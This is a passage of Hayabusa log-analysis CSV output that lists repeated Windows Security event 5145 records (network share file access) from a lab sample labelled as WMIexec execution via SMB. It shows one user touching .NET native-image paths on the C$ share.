0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\naphlpr\0ed1ed0e250773e63d7fe047dde76c81 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\napinit | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napinit\1264f8bd57934a4941865b3c0512803e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napsnap | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napsnap\5ab2511c5224a660e85286b3f2c2b752 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c968d57# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c968d57#\cc32e4d4e4dfbff56d3ae35134c1f38e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8#\6a2929eeb7b5fa6ff9ef1b0f4ff440f1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | 
Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1da2af67# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1da2af67#\efd939ad16f7521ac6c0c15afdcb2fa2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64#\8bb4776b03f3c369fd0c81c51cf468ac | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ 
| Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\92388fbe99436e6ed1f56ee56f10c565 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe#\9bb6d55c49486153c1c1872929def220 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: 
\??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio53a7a42c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio53a7a42c#\373b26e93f287f3cda45a6282a1de0d3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio080b339b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio080b339b#\9551a2df153a961cbbcb79bca937a833 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share 
Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a7b877# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a7b877#\db7fe97a2a840dcc0278f7af89ea7fbe | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c#\be1a119716bb1de8469b568ec9e31d9c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | 
Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca#\e1c86f334a29d92ca264950085cd817e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiob3047ded# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiob3047ded#\8bda9cd4f7d015f685bae38300b2c281 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ 
| Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiod51afaa5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiod51afaa5#\276763baa173e2b94a6318e28594e7ee | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\619034abb9a9fb1b3dc32c0a9aa38d3c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | 
Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\PresentationUI | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\PresentationUI\e4b5f01da74352b18e1dffd68b611367 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework\8a1ed041bc25980a548a96cf4b78f4b6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | 
Path: Windows\assembly\NativeImages_v4.0.30319_32\SecurityAudf6921413# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SecurityAudf6921413#\6f2318339b6bd916c3c62b95c91b305d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics\352d34797f7cd44cd0973c33539200f1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost\a4c49e23c0c23b5db4c663738eac897e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SrpUxSnapIn | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SrpUxSnapIn\d82382933ba69165a4398eba2fb6c0b2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\System | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System\c24d08cc4e93fc4f6f15a637b00a2721 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628#\1a6ec0d19dfcc35f62014ff3602e6a54 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e#\86d8003fea61ae88dd34584f08a9393c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd#\a6af57d6c4eee4a8e0165604baa15b61 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | 
